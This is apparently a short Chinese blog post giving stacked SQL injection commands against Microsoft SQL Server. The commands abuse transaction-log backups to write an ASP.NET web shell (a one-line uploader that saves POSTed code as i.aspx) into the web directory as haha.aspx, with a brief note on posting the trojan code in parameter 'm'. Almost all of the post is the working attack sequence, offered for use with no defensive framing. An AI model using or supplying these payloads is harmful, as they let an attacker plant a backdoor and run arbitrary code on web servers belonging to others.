;alter database pubs set RECOVERY FULL
;create table pubs.dbo.cmd(a image)
;backup log pubs to disk = 'c:\TM' with init
;insert into pubs.dbo.cmd(a) values ('<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("i.aspx"),false);ow.Write(Request.Params["m"]);ow.Close()%> ')
;backup log pubs to disk = 'd:\haha.aspx'
这个和asp的一样,客户端post一个变量m把木马代码丢在变量m里面就行了。这个是类似asp的一句话木马的。
网上的asp.net的上传文件程序
;drop table pubs.dbo.cmd
;alter database pubs set RECOVERY FULL
;create table pubs.dbo.cmd(a image)
;backup log pubs to disk = 'c:\TM' with init
;insert into pubs.dbo.cmd(a) values ('')
;backup log pubs to disk = 'd:\haha2.aspx'
阅读(515) | 评论(0) | 转发(0) |